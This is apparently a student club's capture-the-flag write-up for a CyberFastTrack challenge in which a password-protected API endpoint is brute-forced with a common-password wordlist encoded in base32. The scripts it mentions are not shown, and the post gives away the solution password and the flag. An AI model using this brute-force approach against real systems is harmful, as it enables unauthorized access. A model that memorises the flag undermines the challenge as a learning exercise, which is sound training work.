Endgame
- Cyber Catamounts
- Oct 2, 2020
- 1 min read
Briefing:
Hi all, we've found an API endpoint that looks pretty suspicious. We know this hacker team is pretty bad on the defensive side, so we're sure that a word list of the 1k most common passwords will be of use. However, we have received intel that in order for you to gain access, the password must be encoded in base32. Good Luck!
Challenge credits to CyberFastTrack. Thank you for the learning resource!
So, we know a few things:
The endpoint takes a password
The password must be encoded in base32
We have to try the word list of the 1k most common passwords
With some Googling, you can get the password list (We apologize, there's some profanity)
Here's a quick Python program to brute force the password:
I added some comments for understanding
Guess what? You can do it with Bash too (and essentially any other program language)!
Actually... Maybe not. This is an example of what a bash script could look like. The problem is that I can't find a good base32 encoder (I probably could figure it out if I did more research). I'm pretty sure it would function if the perl line was valid, so feel free to give it a go.
Go ahead and try it out for yourself:
Anyways, the password is coffee (wow so original, I know)!
Be sure to send your scripts in the #weekly-challenges channel!
Flag: Brutal_Encoding
Comments